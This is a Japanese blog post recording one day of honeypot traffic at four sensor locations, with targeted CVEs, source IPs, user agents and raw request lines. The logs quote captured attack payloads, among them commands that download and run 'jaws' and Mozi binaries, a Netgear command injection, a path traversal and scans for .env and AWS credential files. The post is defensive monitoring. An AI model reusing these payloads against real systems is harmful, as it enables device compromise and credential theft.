コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2022/08/29 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2022/08/29分です。

特徴
共通

GPONルータの脆弱性を狙うアクセス
/.envへのスキャン行為

Location:JP

NetGear製品の脆弱性を狙うアクセス
IDBTE4M CODE87によるスキャン行為
aiohttpによるスキャン行為
/.awsへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget synns.cf/jaws;
sh /tmp/jaws
Location:US

PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
.jsへのスキャン行為
5.188.210.227に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget networkmapping.xyz/jaws;
sh /tmp/jaws
cd /tmp;
rm -rf *;
wget synns.cf/jaws;
sh /tmp/jaws
Location:UK

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Atlassian Jira Server/Data Centerの脆弱性(CVE-2021-26086)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
Lkx-TraversalHttpPluginによるスキャン行為
l9exploreによるスキャン行為
/.gitへのスキャン行為
UserAgentがHello, Worldであるアクセス

を確認しました。

Location:SG

JBoss脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
.jsへのスキャン行為
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
WordPressへのスキャン行為

を確認しました。

アクセス数推移

JP:総アクセス数:143 (前日比:86)
US:総アクセス数:66 (前日比:-8)
UK:総アクセス数:52 (前日比:-78)
SG:総アクセス数:72 (前日比:7)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 1.246.222.245 South Korea
1 20.4.53.227 United States
1 20.168.60.107 United States
4 20.228.137.102 United States
70 38.91.106.96 United States
2 41.35.21.168 Egypt
1 64.62.197.179 United States
1 64.227.104.242 United States
1 79.110.62.47 Bulgaria
1 92.118.39.30 Romania
16 95.214.235.205 Ukraine
5 103.151.125.91 Vietnam
2 109.237.103.118 Russia
2 109.237.103.123 Russia
17 135.125.217.54 France
1 137.184.219.40 United States
4 137.220.228.90 Singapore
1 146.190.20.100 United States
1 147.182.181.147 United States
2 156.198.164.212 Egypt
1 185.202.173.121 Canada
1 185.220.101.172 Germany
1 188.165.87.110 France
1 188.166.32.192 United States
1 192.241.236.174 United States
1 205.210.31.15 United States
1 207.254.102.146 United States
1 209.141.35.128 United States
1 212.129.42.146 France

UserAgent一覧

件数 UserAgent
7 -
4 Go-http-client/1.1
4 Hello, world
1 IDBTE4M CODE87
1 Mozilla/5.0 (Linux; Android 7.1; vivo 1716 Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Mobile Safari/537.36
5 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
112 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Python/3.7 aiohttp/3.7.4.post0
1 xxx

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_18.179.20.5_80\n
2 \x16\x03\x01\x01D\x01
2 \x16\x03\x01
1 CONNECT google[.]com:443 HTTP/1.1
1 GET /.aws/config HTTP/1.1
1 GET /.aws/credentials HTTP/1.1
1 GET /.docker/.env HTTP/1.1
1 GET /.docker/laravel/app/.env HTTP/1.1
1 GET /.env.backup HTTP/1.1
1 GET /.env.bak HTTP/1.1
1 GET /.env.local HTTP/1.1
1 GET /.env.prod.local HTTP/1.1
1 GET /.env.prod HTTP/1.1
1 GET /.env.production.local HTTP/1.1
45 GET /.env HTTP/1.1
1 GET /.msmtprc HTTP/1.1
1 GET /?pp=env HTTP/1.1
2 GET /_profiler/phpinfo HTTP/1.1
1 GET /acme-challenge/.env HTTP/1.1
1 GET /acme_challenges/.env HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /admin/phpinfo.php HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /beta/.env HTTP/1.1
1 GET /bootstrap/.env HTTP/1.1
1 GET /conf/.env HTTP/1.1
2 GET /config/.env HTTP/1.1
2 GET /core/.env HTTP/1.1
1 GET /core/app/.env HTTP/1.1
2 GET /dashboard/phpinfo.php HTTP/1.1
1 GET /debug/default/view.html HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
1 GET /debug/default/view HTTP/1.1
1 GET /doc/.env HTTP/1.1
1 GET /docker/.env HTTP/1.1
1 GET /docker/app/.env HTTP/1.1
1 GET /dotfiles/.env HTTP/1.1
1 GET /en/.env HTTP/1.1
1 GET /error/.env HTTP/1.1
6 GET /favicon.ico HTTP/1.1
1 GET /frontend/web/debug/default/view HTTP/1.1
2 GET /info.php HTTP/1.1
1 GET /infos.php HTTP/1.1
1 GET /js/.env HTTP/1.1
1 GET /kyc/.env HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /laravel/core/.env HTTP/1.1
1 GET /lib/.env HTTP/1.1
1 GET /libs/.env HTTP/1.1
1 GET /linusadmin-phpinfo.php HTTP/1.1
1 GET /login HTTP/1.1
1 GET /old_phpinfo.php HTTP/1.1
1 GET /php-info.php HTTP/1.1
2 GET /phpinfo.php HTTP/1.1
1 GET /phpinfo/phpinfo.php HTTP/1.1
1 GET /phpinfo HTTP/1.1
1 GET /prod/.env HTTP/1.1
1 GET /pub/.env HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /s3cmd.ini HTTP/1.1
1 GET /sapi/debug/default/view HTTP/1.1
1 GET /server/phpinfo.php HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//1[.]246[.]222[.]245:4959/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
4 GET /shell?cd+/tmp;rm+-rf+*;wget+synns[.]cf/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /site/.env HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /sites/.env HTTP/1.1
1 GET /test.php HTTP/1.1
1 GET /tool/view/phpinfo.view.php HTTP/1.1
1 GET /trang-cam-nang/ HTTP/1.1
1 GET /uploads/config.env HTTP/1.1
1 GET /web/debug/default/view HTTP/1.1
1 GET /wp-config.php-backup HTTP/1.1
1 GET /wp-content/.env HTTP/1.1
2 GET /wp-content/phpinfo.php HTTP/1.1
1 GET http[:]//example[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /api/v0/id HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.188.210.227 Russia
1 20.119.101.185 United States
1 20.150.205.138 United States
1 20.226.82.201 United States
1 41.43.195.181 Egypt
20 51.79.29.48 Canada
3 54.37.79.75 France
1 64.227.104.242 United States
2 80.87.206.247 Russia
1 92.118.39.30 Romania
1 104.248.204.195 United States
2 109.237.103.118 Russia
2 109.237.103.123 Russia
1 141.98.6.110 Bulgaria
1 147.182.184.92 United States
2 152.89.196.62 Russia
1 159.203.102.227 United States
2 162.142.125.121 United States
2 162.142.125.213 United States
1 163.123.143.129 United States
1 172.105.89.161 United States
1 184.105.247.251 United States
1 185.43.16.97 Italy
1 185.220.101.179 Germany
8 185.254.196.223 Ukraine
1 192.46.216.171 United States
1 192.241.237.82 United States
2 194.26.192.210 Germany
1 194.26.228.174 Russia
1 208.67.105.124 United States
1 209.127.109.54 Canada

UserAgent一覧

件数 UserAgent
8 -
5 Go-http-client/1.1
2 Hello, world
2 Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
37 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) CriOS/29.0.1547.11 Mobile/9B206 Safari/7534.48.3

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 MGLNDD_34.68.118.83_80\n
2 \x16\x03\x01\x01D\x01
1 \x16\x03\x01
1 CONNECT google[.]com:443 HTTP/1.1
38 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /Public/home/js/check.js HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
6 GET /favicon.ico HTTP/1.1
1 GET /pv/aastra.cfg HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+networkmapping[.]xyz/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+synns[.]cf/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /static/admin/javascript/hetong.js HTTP/1.1
1 GET /trang-cam-nang/ HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
2 GET http[:]//example[.]com/ HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 20.199.108.183 United States
1 64.62.197.176 United States
1 67.207.90.255 United States
1 92.119.177.20 Romania
2 109.237.103.118 Russia
2 109.237.103.123 Russia
1 117.199.15.102 India
1 119.189.234.61 China
1 120.142.105.155 South Korea
2 152.89.196.62 Russia
4 154.198.193.134 Seychelles
22 161.35.86.181 United States
2 167.94.138.60 United States
8 185.254.196.223 Ukraine
1 192.241.221.54 United States
1 198.235.24.137 United States
1 209.141.49.169 United States

UserAgent一覧

件数 UserAgent
9 -
7 Go-http-client/1.1
1 Hello, World
1 Java/1.8.0_341
1 Lkx-TraversalHttpPlugin/0.0.1 (+https[:]//leakix[.]net/, +https[:]//twitter[.]com/HaboubiAnis)
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
10 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; http[:]//www[.]jobboerse[.]com/bot.htm) Gecko/20100101 Firefox/38.0
17 l9explore/1.3.0

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_132.145.66.34_80\n
2 \x16\x03\x01\x01D\x01
3 \x16\x03\x01
1 CONNECT leakix[.]net:443 HTTP/1.1
1 CONNECT www[.]google[.]com:443 HTTP/1.1
1 GET /.DS_Store HTTP/1.1
12 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /.json HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /api/geojson?url=file:///etc/hosts HTTP/1.1
1 GET /api/search?folderIds=0 HTTP/1.1
1 GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
1 GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1
1 GET /config.json HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
1 GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1
5 GET /favicon.ico HTTP/1.1
1 GET /frontend_dev.php/$ HTTP/1.1
1 GET /idx_config/ HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /login.action HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1
1 GET /server-status HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /telescope/requests HTTP/1.1
1 GET /trang-cam-nang/ HTTP/1.1
1 GET /v2/_catalog HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 PRI * HTTP/2.0
1 PUT /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
4 27.124.32.147 Singapore
19 54.37.79.75 France
2 62.233.50.179 Russia
1 66.240.192.82 United States
1 67.207.90.255 United States
2 80.87.206.250 Russia
1 95.214.24.192 Bulgaria
11 103.47.60.33 Indonesia
5 103.151.125.91 Vietnam
1 104.208.84.26 United States
2 109.237.103.118 Russia
2 109.237.103.123 Russia
1 143.244.154.134 United States
2 152.89.196.62 Russia
1 161.35.188.242 United States
2 162.142.125.212 United States
2 163.123.143.129 United States
2 167.248.133.44 United States
8 185.254.196.223 Ukraine
1 192.241.212.213 United States
1 194.26.228.174 Russia
1 198.235.24.14 United States

UserAgent一覧

件数 UserAgent
11 -
6 Go-http-client/1.1
1 Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)
2 Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36
6 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
30 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_13.67.44.234_80
2 \x03
2 \x16\x03\x01\x01D\x01
4 \x16\x03\x01
31 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=s98j3ug7 HTTP/1.1
1 GET /Public/home/js/check.js HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /actuator/env HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
3 GET /favicon.ico HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /invoker/readonly HTTP/1.1
1 GET /jenkins/login HTTP/1.1
1 GET /login HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /script HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /static/admin/javascript/hetong.js HTTP/1.1
1 GET /trang-cam-nang/ HTTP/1.1
1 GET /users/sign_in HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 GET http[:]//example[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /_ignition/execute-solution HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 PRI * HTTP/2.0